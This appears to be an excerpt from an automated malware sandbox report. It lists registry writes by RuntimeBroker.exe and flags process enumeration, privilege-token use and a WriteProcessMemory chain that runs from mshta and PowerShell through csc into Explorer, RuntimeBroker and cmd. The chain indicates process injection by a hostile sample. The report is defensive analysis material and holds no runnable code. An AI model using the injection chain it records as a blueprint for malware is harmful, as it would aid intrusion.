00000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000000355115c2000336164636135366335616264636462383538353130633631666161373333303038303635643532316361346139316361396436366536643662306139356233630000b20009000400efbe0355115c0355115c2e00000000000000000000000000000000000000000000000000b42f8100330061006400630061003500360063003500610062006400630064006200380035003800350031003000630036003100660061006100370033003300300030003800300036003500640035003200310063006100340061003900310063006100390064003600360065003600640036006200300061003900350062003300630000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000008a22f97a1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c33616463613536633561626463646238353835313063363166616137333330303830363564353231636134613931636139643636653664366230613935623363000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000071617a6b676e75780000000000000000bca7cefcc5848241ae2fb45b654f157a7214d89cea08ed11b78d56b8b6dcaeaebca7cefcc5848241ae2fb45b654f157a7214d89cea08ed11b78d56b8b6dcaeaece000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0031003100300031003900300037003800360031002d003200370034003100310035003900310037002d0032003100380038003600310033003200320034002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000265cf8bc000000000000d01200000000000000000000000000000000 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\fa81ba26-2b77-4c42- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6b80ac69-96fc-4319- = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\67e3704f-6c17-41eb- C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\67e3704f-6c17-41eb- C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6b80ac69-96fc-4319- = "\\\\?\\Volume{BCF85C26-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\37a5dc662a21e2e4f39235304b188e73bc2e198a60d3cbaa712dc378bc941121" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5072bc72-5364-4bd5- C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5072bc72-5364-4bd5- = 0114020000000000c0000000000000464c0000000114020000000000c000000000000046830000002000000008235eb92ca7d801d46fc9b92ca7d801d46fc9b92ca7d801908e06000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000000355115c2000613133313765333937613733663438643164653337316665663065666561653430653539613064343466663639356264303031646164393033303736383735360000b20009000400efbe0355115c0355115c2e000000000000000000000000000000000000000000000000000cb98a00610031003300310037006500330039003700610037003300660034003800640031006400650033003700310066006500660030006500660065006100650034003000650035003900610030006400340034006600660036003900350062006400300030003100640061006400390030003300300037003600380037003500360000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000008a22f97a1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c61313331376533393761373366343864316465333731666566306566656165343065353961306434346666363935626430303164616439303330373638373536000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000071617a6b676e75780000000000000000bca7cefcc5848241ae2fb45b654f157a7014d89cea08ed11b78d56b8b6dcaeaebca7cefcc5848241ae2fb45b654f157a7014d89cea08ed11b78d56b8b6dcaeaece000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0031003100300031003900300037003800360031002d003200370034003100310035003900310037002d0032003100380038003600310033003200320034002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000265cf8bc000000000000d01200000000000000000000000000000000 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9d3535f7-b45f-4e2b- = "\\\\?\\Volume{BCF85C26-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\fe62587e9b241d80c98ec9c7d672f1c986d9ec5980d91198bb71e91272d3d3cc" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\815e2288-3362-42d5- = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\fa81ba26-2b77-4c42- = 89f7dbb82ca7d801 C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6b80ac69-96fc-4319- C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\815e2288-3362-42d5- C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4fbddba7-5cb2-42b6- = 2c6f06ba2ca7d801 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4cf88311-6fdd-4d3b- = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e02ef476-262e-4b5a- C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\69a3c2e2-768b-4fa4- = 153bf3b82ca7d801 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\67e3704f-6c17-41eb- = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\84484181-4d51-4a9a- = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\815e2288-3362-42d5- = 4977f7b92ca7d801 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\662b2298-f70d-4172- = "\\\\?\\Volume{BCF85C26-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\fe62587e9b241d80c98ec9c7d672f1c986d9ec5980d91198bb71e91272d3d3cc" C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e02ef476-262e-4b5a- C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\fa81ba26-2b77-4c42- = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\fa81ba26-2b77-4c42- = "\\\\?\\Volume{BCF85C26-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\a05ddd36a35d41d8407134ded41b831916b63e04ccbdc3de114173546de66693" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6b80ac69-96fc-4319- = 442216b92ca7d801 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5072bc72-5364-4bd5- = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5072bc72-5364-4bd5- = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\815e2288-3362-42d5- C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4fbddba7-5cb2-42b6- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6b80ac69-96fc-4319- = "0" C:\Windows\System32\RuntimeBroker.exe N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\RuntimeBroker.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\RuntimeBroker.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 428 wrote to memory of 4556 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 428 wrote to memory of 4556 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 428 wrote to memory of 4556 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2216 wrote to memory of 4384 N/A C:\Windows\System32\mshta.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2216 wrote to memory of 4384 N/A C:\Windows\System32\mshta.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4384 wrote to memory of 4108 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 4384 wrote to memory of 4108 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 4108 wrote to memory of 3796 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 4108 wrote to memory of 3796 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 4384 wrote to memory of 3116 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 4384 wrote to memory of 3116 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 3116 wrote to memory of 3580 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 3116 wrote to memory of 3580 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 4384 wrote to memory of 2648 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 4384 wrote to memory of 2648 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 4384 wrote to memory of 2648 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 4384 wrote to memory of 2648 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 2648 wrote to memory of 3444 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2648 wrote to memory of 3444 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2648 wrote to memory of 3444 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2648 wrote to memory of 3444 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2648 wrote to memory of 3788 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2648 wrote to memory of 3788 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2648 wrote to memory of 3788 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2648 wrote to memory of 3788 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2648 wrote to memory of 4408 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2648 wrote to memory of 4408 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2648 wrote to memory of 4408 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2648 wrote to memory of 4408 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2648 wrote to memory of 5096 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2648 wrote to memory of 5096 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2648 wrote to memory of 5096 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2648 wrote to memory of 5096 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2648 wrote to memory of 4292 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 2648 wrote to memory of 4292 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 2648 wrote to memory of 5000 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe
PID 2648 wrote to memory of 5000 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe
